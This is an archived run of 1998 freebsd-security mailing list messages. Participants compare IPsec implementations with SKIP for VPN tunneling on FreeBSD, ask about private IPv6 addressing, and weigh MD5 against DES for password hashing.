Received: from mixcom.mixcom.com (daemon@mixcom.mixcom.com [198.137.186.100]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id IAA28365 for ; Thu, 28 May 1998 08:22:04 -0700 (PDT) (envelope-from sysop@mixcom.com)
Received: by mixcom.mixcom.com (8.6.12/2.2) id KAA20432; Thu, 28 May 1998 10:24:12 -0500
Received: from mix-nt.mixcom.com(198.137.186.7) by mixcom.mixcom.com via smap (V1.3) id sma020417; Thu May 28 10:23:58 1998
Message-ID: <001001bd8a4c$5ed225a0$07ba89c6@mix-nt.mixcom.com>
From: "Sysop"
To:
Subject: unsubscribe
Date: Thu, 28 May 1998 10:22:04 -0500
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 4.72.2106.4
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

unsubscribe

From owner-freebsd-security Thu May 28 10:55:16 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17583 for freebsd-security-outgoing; Thu, 28 May 1998 10:55:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17557 for ; Thu, 28 May 1998 10:55:08 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu)
Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id NAA23696; Thu, 28 May 1998 13:54:16 -0400 (EDT)
Message-Id:
<199805281754.NAA23696@adk.gr>
To: Open Systems Networking
Cc: Ian Cooper , Atipa , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling
In-reply-to: Your message of "Thu, 28 May 1998 04:48:27 EDT."
Date: Thu, 28 May 1998 13:54:16 -0400
From: "Angelos D. Keromytis"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

To: Open Systems Networking
Subject: Re: FreeBSD Tunneling
Cc: Ian Cooper , Atipa ,
Date: 05/28/98, 13:54:15

In message , Open Systems Networking writes:
>
>> The WIDE implementation, IMHO is a pretty clean one, and since it

I surely hope you're not implying otherwise for certain other
implementations :-)

>> is inherently a FreeBSD implementation rather than a port, I'd
>> suggest that it be considered as a strong candidate for the "official"
>> implementation.

Um. Maybe I wasn't clear. We're not quite aiming at becoming a/the
"official" implementation. If people think the port's useful, they'll
use it; if it's extremely useful, maybe it will be integrated in the
kernel. Ditto for the WIDE code. If the latter happens, we'll interop
against it.

I've only briefly looked in the distant past at the WIDE code. It was
good code (I usually have trouble reading code written in Japan), but
rather incomplete in the features it supported (things may have
changed). In any case, I'd urge you to try and interoperate with
OpenBSD post-2.3 IPsec, since we've done major interoperability
testing with many other (commercial) vendors.

An amusing detail: the OpenBSD IPsec was originally written for BSD/OS
(by John Ioannidis), then ported to NetBSD (by me), and then moved to
OpenBSD (by Niels Provos and me). So we'd like to claim that we've
gone through all the BSDs :-)

>Let the best Stack win :)

Sorry, not a contest :-)

>> We also have plans for an ISAKMP implementation. If others volunteer
>> to do some of the non-crypto ISAKMP stuff, then we can do the crypto
>> part and that would speed up the availability of isakmp.

Hm.
There is one free implementation of ISAKMP/Oakley (now called IKE),
named pluto. Written originally by yours truly, it's now being
supported by the FreeSWAN project (I forget the URL, mailing list is
linux-ipsec@clinet.fi, usual majordomo to subscribe).

Unfortunately, that code is under GPL (yes, I know, but I was young
and needed the money...err...). It's also horrible (250KB
speed-written in 3 weeks, to meet a deadline), but it's more or less
free (modulo GPL), outside the US (written in Greece, supported by
people in Canada), and there is some support. AFAIK it's the only one
with these properties (yes, even the horrible code :-)

The FreeSWAN project is Linux-oriented, but pluto was written on
OpenBSD (and should be trivially portable), and there's quite a bit of
cooperation between them and the OpenBSD IPsec group.

I'll shut up now.
- -Angelos

PS. Found the URL, it's http://www.xs4all.nl/~freeswan/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBNW2kx70pBjh2h1kFAQHkwgQAkNw6RrLbhPga9kLH3MITs0tq8l5ItGfI
HP/Qu8Z42dhOGQivvYbEH8uPRZiJmP7iMNNKyZd7U1tcEpcr2OYKOns8jqaSdnIf
X6SC6SDJiXPy1sOFXXBBpSQrDqcPf5lEMMSLGec0K1oTYxNVGu5fZcrlZ+wA7Zow
jXfHVSXd5w0=
=g4GP
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu May 28 12:46:55 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08111 for freebsd-security-outgoing; Thu, 28 May 1998 12:46:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA08083 for ; Thu, 28 May 1998 12:46:50 -0700 (PDT) (envelope-from mike@dingo.cdrom.com)
Received: from dingo.cdrom.com (localhost [127.0.0.1]) by dingo.cdrom.com (8.8.8/8.8.5) with ESMTP id LAA00771; Thu, 28 May 1998 11:40:23
-0700 (PDT)
Message-Id: <199805281840.LAA00771@dingo.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Atipa
cc: "Angelos D. Keromytis" , Open Systems Networking , freebsd-security@FreeBSD.ORG
Subject: Re: SKIP problems
In-reply-to: Your message of "Wed, 27 May 1998 16:01:31 MDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 28 May 1998 11:40:23 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

>
> > >OpenBSD just made a vpn command "that makes virtual private networks
> > >trivial". I was messing around w/ IPsec and Photurisd and also got really
> > >frustrated as well :(.
> > >
> > >Just FYI.
> >
> > "Trivial" is probably too strong a statement, but it certainly makes
> > them easier. The biggest step is actually the existence of
> > documentation. I should point out that OpenBSD does *not* use SKIP
> > (nor is it likely to do so in the foreseeable future).

... thus making it incapable of interoperation with the various other
platforms which do. That's Bad.

--
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.
\\ msmith@cdrom.com

From owner-freebsd-security Thu May 28 12:48:09 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA08586 for freebsd-security-outgoing; Thu, 28 May 1998 12:48:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA08320 for ; Thu, 28 May 1998 12:47:43 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu)
Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id PAA26621; Thu, 28 May 1998 15:47:00 -0400 (EDT)
Message-Id: <199805281947.PAA26621@adk.gr>
To: Mike Smith
Cc: Atipa , Open Systems Networking , freebsd-security@FreeBSD.ORG
Subject: Re: SKIP problems
In-reply-to: Your message of "Thu, 28 May 1998 11:40:23 PDT." <199805281840.LAA00771@dingo.cdrom.com>
Date: Thu, 28 May 1998 15:47:00 -0400
From: "Angelos D. Keromytis"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

-----BEGIN PGP SIGNED MESSAGE-----

To: Mike Smith
Subject: Re: SKIP problems
Cc: Atipa ,
Date: 05/28/98, 15:46:59

In message <199805281840.LAA00771@dingo.cdrom.com>, Mike Smith writes:
>
>... thus making it incapable of interoperation with the various other
>platforms which do. That's Bad.
>

Not that many platforms use SKIP. IPsec is the IP security standard,
and not SKIP. No point supporting a bad standard-wannabe.
- -Angelos

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAwUBNW2/NL0pBjh2h1kFAQGFHgP/XKKqGg0p9xYTyRm2EUSy3cYuDHl+NWj3
V2XyRJpY4ADwsqPWfGojpDRxewTeDK2BaN17AsmzGoPfiuMZGVQ3LAyfOByLtYmh
kFbQK5ekRvqLT2L+6HwcQex6a8mIvZew/ApLBLyueChNxoxDP4OCgWYNrN9Er7z6
SvzBHokJRyo=
=0XUb
-----END PGP SIGNATURE-----

From owner-freebsd-security Thu May 28 14:31:55 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA00238 for freebsd-security-outgoing; Thu, 28 May 1998 14:31:55 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from vger.alaska.net (vger.alaska.net [209.112.156.61]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA00226 for ; Thu, 28 May 1998 14:31:42 -0700 (PDT) (envelope-from simestd@alaska.net)
Received: from localhost (simestd@localhost) by vger.alaska.net (8.8.8/8.8.8) with SMTP id NAA22749; Thu, 28 May 1998 13:28:33 -0800 (AKDT) (envelope-from simestd@alaska.net)
X-Authentication-Warning: vger.alaska.net: simestd owned process doing -bs
Date: Thu, 28 May 1998 13:28:33 -0800 (AKDT)
From: "Thomas D. Simes"
To: "Angelos D. Keromytis"
cc: Mike Smith , Atipa , Open Systems Networking , freebsd-security@FreeBSD.ORG
Subject: Re: SKIP problems
In-Reply-To: <199805281947.PAA26621@adk.gr>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, 28 May 1998, Angelos D. Keromytis wrote:

> In message <199805281840.LAA00771@dingo.cdrom.com>, Mike Smith writes:
> >
> >... thus making it incapable of interoperation with the various other
> >platforms which do. That's Bad.
> >
>
> Not that many platforms use SKIP. IPsec is the IP security standard,
> and not SKIP. No point supporting a bad standard-wannabe.
> - -Angelos

At the risk of asking an obvious question - how is IPsec currently
implemented in FreeBSD? SKIP is something that can be used now - it may
not be the best solution, but it is something that can be implemented
today.

Tom

======================================================================
Thomas D. Simes                            Chief Technology Instigator
simestd@alaska.net                                     Internet Alaska
                  You are what you do when it counts.
======================================================================

From owner-freebsd-security Thu May 28 16:14:06 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA20369 for freebsd-security-outgoing; Thu, 28 May 1998 16:14:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from church.cse.ogi.edu (root@cse.ogi.edu [129.95.20.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA20328 for ; Thu, 28 May 1998 16:13:54 -0700 (PDT) (envelope-from jrb@cse.ogi.edu)
Received: from cse.ogi.edu (jrb@church.cse.ogi.edu [129.95.42.2]) by church.cse.ogi.edu (8.8.6/8.8.6) with ESMTP id QAA10504; Thu, 28 May 1998 16:13:30 -0700 (PDT)
Message-Id: <199805282313.QAA10504@church.cse.ogi.edu>
To: "Thomas D. Simes"
cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKIP problems
In-Reply-To: Your message of "Thu, 28 May 1998 13:28:33 -0800."
Date: Thu, 28 May 1998 16:13:29 -0700
From: Jim Binkley
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

It's a good point Tom and it could stand MUCH clarification.
(the how is IPSEC question, not the SKIP part.
SKIP is not an IETF standard and was rejected by the IPSEC wg several
years ago (along with photuris))...

>
>At the risk of asking an obvious question - how is IPsec currently
>implemented in FreeBSD? SKIP is something that can be used now - it may
>not be the best solution, but it is something that can be implemented
>today.
>
>Tom

I can think of at MANY different IPSEC implementations that could
stand to learn from each other (I suspect). We have

1. freebsd/NRL/psu/me as found at http://www.cs.pdx.edu/research/SMN
in case you have been asleep... VPNs via route(8), route(4),
and keyadmin(1). I could try to briefly clarify on-line if
there was interest. I suspect there are at least two or
more IPSEC implementor (camps) that read this list. Maybe
we could all do that (or I could just go on vacation).

1.1 the netbsd/NRL implementations
2. the openBSD used to be netBSD implementation.
3. the WIDE implementation
4. the NIST/linux implementation
5. and the soon to be unleashed Cisco IOS implementation :->
6. bump in the stack implementations

How they work and exactly what they do and do not do is not clear.
IPSEC has specified packet formats, not app/kernel or user apis.
The latter are important and different.

There are many important questions; e.g.,

what about ISAKMP?
what are the kernel interfaces?
how do the kernel parts work?
how do you add a new security transform?
how tested is the code? (how buggy?)
is the code well written?
what is the user (or sysadmin) api?
how does key management work? is ASN involved :->
does it support user-level or only network level?
policy for packets in/out in the o.s.; i.e., when to IPSEC and when not?
tunnel security attributes?
could joe average routing daemon use it?
multicast semantics?
how many tons of docs, if any?
you claim "interoperation", exactly what did that mean?
    end to end apps
    end to router tunnel
    AH with transform Y
    which AH acc. to which RFC/draft
    etc., etc.,
... several things I haven't thought of to throw in the laundry list ...

and of course, our favorite, export control aspects.

Forgive me for this minor explosion.
kind regards,

Jim Binkley
jrb@cse.ogi.edu

From owner-freebsd-security Thu May 28 16:26:20 1998
Message-Id: <199805282325.TAA19747@adk.gr>
To: Mike Smith , Atipa
Subject: Re: SKIP problems
Cc: Open Systems Networking , freebsd-security@FreeBSD.ORG
Date: Thu, 28 May 1998 19:20:32 EDT
From: "Angelos D. Keromytis"

> At the risk of asking an obvious question - how is IPsec currently
> implemented in FreeBSD? SKIP is something that can be used now - it may
> not be the best solution, but it is something that can be implemented
> today.

That was the topic of the discussion. I think it's fairly easy to port
the OpenBSD IPsec, and there's the WIDE implementation (I'm told).

-Angelos

From owner-freebsd-security Thu May 28 18:20:34 1998
Message-Id: <199805290119.VAA03275@adk.gr>
To: simestd@alaska.net
Subject: Re: SKIP problems
Cc: freebsd-security@FreeBSD.ORG
Date: Thu, 28 May 1998 21:14:44 EDT
From: "Angelos D. Keromytis"

> SKIP is not an IETF standard and was rejected by the IPSEC wg several
> years ago (along with photuris))...

Touche' Although the circumstances were different in the two situations.

> 1. freebsd/NRL/psu/me as found at http://www.cs.pdx.edu/research/SMN
>    in case you have been asleep... VPNs via route(8), route(4),
>    and keyadmin(1). I could try to briefly clarify on-line if

Sounds similar to the OpenBSD code, although I haven't seen the NRL code
(being a foreigner and all that).

>    there was interest. I suspect there are at least two or more
>    IPSEC implementor (camps) that read this list. Maybe we could
>    all do that (or I could just go on vacation).

FYI, the linux-ipsec@clinet.fi mailing list (which was originally
intended to be the FreeSWAN list) has occasionally interesting
discussions, and at least 4 or 5 implementors are on it (that I know of).

> 2. the openBSD used to be netBSD implementation.

...used to be BSD/OS :-)

> what about ISAKMP?

Not using it. No good free implementations available (yet). FreeSWAN is
working on it, maybe when they have something stable.

> what are the kernel interfaces?

PF_ENCAP (looks like a simplified PF_KEYv2)

> how do the kernel parts work?

http://www.cis.upenn.edu/~angelos/ipsec.ps.gz

>how do you add a new security transform?

ipsecadm (1) or photurisd (8) and possibly isakmp in the future

>how tested is the code? (how buggy?)

The first version of the code was written back in 1995. I can't claim
that there aren't any bugs left, but the code has been tested (and is
being tested) and used

> is the code well written?

I'm probably biased, but I've heard from 3 people who have no connection
to the project that it's well written and tight. It's at least
reasonably good.

> what is the user (or sysadmin) api?

PF_ENCAP..expect a draft soon

>how does key management work?

Which part ?

> is ASN involved :->

No!

> does it support user-level or only network level?

Supports both user-level and network level. It'll at some point be able
to also act as bump-in-the-wire

>policy for packets in/out in the o.s.; i.e., when to IPSEC
> and when not?

Outgoing packets based on source/destination addresses (possibly
subnetted), transport protocol, UDP/TCP source/destination ports.
Recently added per-socket policies with the automated keying.

> tunnel security attributes?

Yes.

> could joe average routing daemon use it?

Routing daemon ?! You could have your routing infrastructure point
everything at your IPsec firewall, if that's what you mean.

> multicast semantics?

Not completed (yet). We haven't focused on that, since there hasn't been
much demand on it (yet).

> how many tons of docs, if any?

Not many. Some man pages, a paper (URL above). A short article in the
OpenBSD Journal.

>you claim "interoperation", exactly what did that mean?
> end to end apps
> end to router tunnel
> AH with transform Y
> which AH acc. to which RFC/draft

End-to-end, firewall-to-firewall tunnel telnet, ping and ftp.
Have tested:
    old ESP DES and 3DES
    old AH MD5 and SHA1
    new ESP DES and 3DES, with MD5 and SHA1
    new AH MD5 and SHA1

I believe Rodney Thayer (rodney@sabletech.com) maintains a
sort-of-recent interoperability matrix, you can find OpenBSD there. The
most recent tests were last September at the ANX Interop Workshop in
Ottawa (interoped with 2-3 implementors, I remember mentat.com and I
think IBM), and at SNDSS at the end of March with Dan McDonald (Sun
Microsystems -- Solaris implementation).

We also support RIPEMD-160 authentication and CAST128 and Blowfish
encryption.

>and of course, our favorite, export control aspects.

No export control, as the code was written, lives and is being
maintained outside the US.

Hope this is informational enough.
Cheers,
-Angelos

From owner-freebsd-security Thu May 28 20:48:39 1998
Date: Thu, 28 May 1998 23:47:23 -0400 (EDT)
From: spork
To: Open Systems Networking
cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling

> I was going to write a section in the handbook for SKIP once I got it
> working but im quite convinced SKIP sucks, and while no one likes writing
> doc's I have seen more documentation on "undocumented" kernel options
> than SKIP. Im sure once its working it is probably nice, but I think the
> implementation must be piss poor if so many people are finding it
> impossible to get configured.

It seems particularly difficult to make it work from FBSD<->win95...
Reminded me of getting the windows 5.5.5 pgp to work with the ol' 2.6.3 on
Unix...
There's always gotta be a 'gotcha'.

Charles

>
> > Agreed on both accounts. Keep in touch w/ me if you want testers, etc.
>
> I'd be happy to test it as well.
>
> Chris
>
> --
> "I don't do favors, I accumulate debts"
>
> ===================================| Open Systems Networking And Consulting.
> FreeBSD 2.2.6 is available now!    | Phone: 316-326-6800
> -----------------------------------| 1402 N. Washington, Wellington, KS-67152
> FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
> http://www.freebsd.org             | Consulting-Network Engineering-Security
> ===================================| http://open-systems.net

From owner-freebsd-security Thu May 28 22:21:12 1998
Date: Fri, 29 May 1998 15:20:52 +1000 (EST)
From: Nicholas Charles Brawn
To: freebsd-security@FreeBSD.ORG
Subject: ipv6 network addresses

Is there an equivalent rfc (to 1918) that covers what network addresses
you can use for internal ipv6 networks? I know that it's not really
worth worrying about at this stage, but it would be good to know
regardless. :)

This might be more for -hackers or -chat, but i thought that it would be
appropriate given the current thread on ipv6 & ipsec implementations.

Nick
--
Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A
http://rabble.uow.edu.au/~nick - public key available on request.
Nicholas Brawn - Computer Science Undergraduate, University of Wollongong.

From owner-freebsd-security Fri May 29 05:30:34 1998
From: "Jim Flowers"
To: "spork" , "Open Systems Networking"
Subject: Re: FreeBSD Tunneling
Date: Fri, 29 May 1998 08:29:07 -0400
Message-ID: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us>

I have no particular interest in defending SKIP which is available for
FreeBSD only because DEC did a reference implementation back at 2.1.0 and
2.1.5. I had to do quite a bit of code juggling to get it to compile with
2.2.5 which resulted in a pretty good understanding of how it works. I have
used it successfully with fbsd to fbsd and Win95 to NT. From NT/Win95 to
fbsd it provides authentication and encapsulation but with no common
encryption methods for transit keys it's in cleartext. I also use an
upgrade (3.0?) for the NT/Win95 program which may not have ever been
released, freely.

I found that there was a great deal of documentation of very high quality at
the user level including a fairly decent powerpoint presentation. The "how
it works" at the program level could use updating to match the current
operation but it's a 10% job, not a 90% job. And of course it could benefit
from patches to use with current. There are three or four modules that are
caught in macro processing differences from 2.1.X to 2.2.X.

All told, I think it's a currently usable option for someone willing to
spend the time. I have one tunnel coupling two private networks over the
Internet with full encryption and encapsulation running for six months
without a hiccup.

-----Original Message-----
From: spork
To: Open Systems Networking
Cc: freebsd-security@FreeBSD.ORG
Date: Friday, May 29, 1998 1:01 AM
Subject: Re: FreeBSD Tunneling

>
>> I was going to write a section in the handbook for SKIP once I got it
>> working but im quite convinced SKIP sucks, and while no one likes writing
>> doc's I have seen more documentation on "undocumented" kernel options
>> than SKIP. Im sure once its working it is probably nice, but I think the
>> implementation must be piss poor if so many people are finding it
>> impossible to get configured.
>
>It seems particularly difficult to make it work from FBSD<->win95...
>Reminded me of getting the windows 5.5.5 pgp to work with the ol' 2.6.3 on
>Unix... There's always gotta be a 'gotcha'.
>
>Charles
>
>>
>> > Agreed on both accounts. Keep in touch w/ me if you want testers, etc.
>>
>> I'd be happy to test it as well.
>>
>> Chris
>>
>> --
>> "I don't do favors, I accumulate debts"
>>
>> ===================================| Open Systems Networking And Consulting.
>> FreeBSD 2.2.6 is available now!    | Phone: 316-326-6800
>> -----------------------------------| 1402 N. Washington, Wellington, KS-67152
>> FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
>> http://www.freebsd.org             | Consulting-Network Engineering-Security
>> ===================================| http://open-systems.net

From owner-freebsd-security Fri May 29 05:38:20 1998
Date: Fri, 29 May 1998 08:38:01 -0400 (EDT)
From: Open Systems Networking
To: Jim Flowers
cc: spork , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling
In-Reply-To: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us>

On Fri, 29 May 1998, Jim Flowers wrote:

> I have no particular interest in defending SKIP which is available for
> FreeBSD only because DEC did a reference implementation back at 2.1.0 and
> 2.1.5. I had to do quite a bit of code juggling to get it to compile with
> 2.2.5 which resulted in a pretty good understanding of how it works. I have
> used it successfully with fbsd to fbsd and Win95 to NT. From NT/Win95 to
> fbsd it provides authentication and encapsulation but with no common
> encryption methods for transit keys it's in cleartext. I also use an
> upgrade (3.0?) for the NT/Win95 program which may not have ever been
> released, freely.
>
> I found that there was a great deal of documentation of very high quality at
> the user level including a fairly decent powerpoint presentation. The "how
> it works" at the program level could use updating to match the current
> operation but it's a 10% job, not a 90% job.

Care to write up how you accomplished this?
Chris

--
"I don't do favors, I accumulate debts"

===================================| Open Systems Networking And Consulting.
FreeBSD 2.2.6 is available now!    | Phone: 316-326-6800
-----------------------------------| 1402 N. Washington, Wellington, KS-67152
FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
http://www.freebsd.org             | Consulting-Network Engineering-Security
===================================| http://open-systems.net

From owner-freebsd-security Fri May 29 07:54:21 1998
Date: Fri, 29 May 1998 10:53:51 -0400 (EDT)
Message-Id: <199805291453.KAA11914@brain.zeus.leitch.com>
From: woods@zeus.leitch.com (Greg A. Woods)
To: freebsd-security@FreeBSD.ORG
Subject: Re: SKIP problems
In-Reply-To: Angelos D. Keromytis's message of "Thu, May 28, 1998 15:47:00 -0400" regarding "Re: SKIP problems " id <199805281947.PAA26621@adk.gr>
References: <199805281840.LAA00771@dingo.cdrom.com> <199805281947.PAA26621@adk.gr>
Reply-To: freebsd-security@FreeBSD.ORG
Organization: Planix, Inc.; Toronto, Ontario; Canada

[ On Thu, May 28, 1998 at 15:47:00 (-0400), Angelos D. Keromytis wrote: ]
> Subject: Re: SKIP problems
>
> Not that many platforms use SKIP. IPsec is the IP security standard,
> and not SKIP.

"may become" ;-)

(So far as I can see it's just a set of out-dated RFCs that will
hopefully be replaced by an updated set (currently in draft status) in
the future, and though it's on the standards track as I understand it,
there's a fair distance to go before it's written in the hardest stone
the IETF writes anything in.)

> No point supporting a bad standard-wannabe.

Well, that depends entirely on the relative merits of the respective
"standard" and non-standard technologies. I sure would support moving a
non-standard into the standards track if it is superior to the currently
proffered "standard".

Not that I want to make any technical appraisals on the pros and cons of
any of the topics being discussed here -- I'm just trying to figure out
all of this stuff too, and it makes me seriously mad when companies with
money to burn start pushing things by making untrue claims about them,
which is exactly what I've been seeing w.r.t. IPsec and ISAKMP.
I think this particular topic is far too important to make a VHS/BETA
example out of it.

--
Greg A. Woods
+1 416 443-1734 VE3TCP
Planix, Inc. ; Secrets of the Weird

From owner-freebsd-security Fri May 29 08:40:31 1998
Message-ID: <19980529173909.62558@deepo.prosa.dk>
Date: Fri, 29 May 1998 17:39:09 +0200
From: Philippe Regnauld
To: Open Systems Networking
Cc: Jim Flowers , spork , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling
References: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us>
In-Reply-To: ; from Open Systems Networking on Fri, May 29, 1998 at 08:38:01AM -0400
Organization: PROSA

Open Systems Networking writes:
> > used it successfully with fbsd to fbsd and Win95 to NT. From NT/Win95 to
> > fbsd it provides authentication and encapsulation but with no common
[...]
> Care to write up how you accomplished this?

Regarding interoperability:

http://www.rsa.com/rsa/SWAN/swan_test.htm

--
-[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-

«Pluto placed his bad dog at the entrance of Hades to keep the dead IN and
the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle

From owner-freebsd-security Fri May 29 09:50:01 1998
Date: Fri, 29 May 1998 12:49:35 -0400 (EDT)
From: Open Systems Networking
To: Cory Kempf
cc: freebsd-security@FreeBSD.ORG
Subject: Re: MD5 v. DES?

On 29 May 1998, Cory Kempf wrote:

redirected to -security

> Is there a discussion somewhere about the merits of MD5 v. DES?
> E.g. what advantages one has over the other?

If I recall from past memories MD5 i believe is faster.

Chris

--
"I don't do favors, I accumulate debts"

===================================| Open Systems Networking And Consulting.
FreeBSD 2.2.6 is available now!    | Phone: 316-326-6800
-----------------------------------| 1402 N. Washington, Wellington, KS-67152
FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
http://www.freebsd.org             | Consulting-Network Engineering-Security
===================================| http://open-systems.net

From owner-freebsd-security Fri May 29 11:31:27 1998
Date: Fri, 29 May 1998 13:33:30 -0500 (CDT)
From: Jason Hudgins
To: freebsd-security@FreeBSD.ORG
Subject: Re: MD5 v. DES?

> redirected to -security
>
> > Is there a discussion somewhere about the merits of MD5 v. DES?
> > E.g. what advantages one has over the other?
>
> If I recall from past memories MD5 i believe is faster.

Which in my opinion, is not necessarily a good thing.
Jason Hudgins
http://www.incantations.net/~thanatos

From owner-freebsd-security Fri May 29 12:02:45 1998
To: Open Systems Networking
cc: Cory Kempf , freebsd-security@FreeBSD.ORG
Subject: Re: MD5 v. DES?
In-reply-to: Your message of "Fri, 29 May 1998 12:49:35 EDT."
Date: Fri, 29 May 1998 20:59:58 +0200
Message-ID: <642.896468398@critter.freebsd.dk>
From: Poul-Henning Kamp

In message , Open Systems Networking writes:
>On 29 May 1998, Cory Kempf wrote:
>
>redirected to -security
>
>> Is there a discussion somewhere about the merits of MD5 v. DES?
>> E.g. what advantages one has over the other?
>
>If I recall from past memories MD5 i believe is faster.

Sign error. MD5 is (as design parameter) slower.

--
Poul-Henning Kamp FreeBSD coreteam member
phk@FreeBSD.ORG "Real hackers run -current on their laptop."
"ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal

From owner-freebsd-security Fri May 29 12:06:33 1998
Date: Fri, 29 May 1998 15:05:19 -0400 (EDT)
From: Robert Watson
Reply-To: Robert Watson
To: Jim Flowers
cc: spork , Open Systems Networking , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling
In-Reply-To: <01bd8afd$5fdb2bc0$8a8266ce@violet.eznets.canton.oh.us>

On Fri, 29 May 1998, Jim Flowers wrote:

> All told, I think it's a currently usable option for someone willing to
> spend the time. I have one tunnel coupling two private networks over the
> Internet with full encryption and encapsulation running for six months
> without a hiccup.

I've also had very good experience creating a VPN between two private
networks using SKIP + a custom tunneling tool. It's been up and running
smoothly (including reboots of both end machines of the tunnel) for a few
weeks, and one of the hosts has moved IPs three times :). I have been very
happy with both its performance and stability.
I admit that it was work to get the configuration right, but it's been
running smoothly since then. I would rather use an IPsec tunnel, but I
don't know of any IPsec LKMs I can load up without spoiling my fairly
clean CVSup'd source base under -stable and -current.

Robert N Watson

----
Carnegie Mellon University http://www.cmu.edu/
Trusted Information Systems http://www.tis.com/
SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org http://www.watson.org/~robert/

From owner-freebsd-security Fri May 29 12:44:00 1998
From: Adam Shostack
Message-Id: <199805291941.PAA08397@homeport.org>
Subject: Re: MD5 v. DES?
In-Reply-To: from Open Systems Networking at "May 29, 98 12:49:35 pm"
To: opsys@mail.webspan.net (Open Systems Networking)
Date: Fri, 29 May 1998 15:41:47 -0400 (EDT)
Cc: ckempf@enigami.com, freebsd-security@FreeBSD.ORG

Open Systems Networking wrote:
| > Is there a discussion somewhere about the merits of MD5 v. DES?
| > E.g. what advantages one has over the other?
|
| If I recall from past memories MD5 i believe is faster.

Is that an advantage in the days of Crack and John the Ripper?
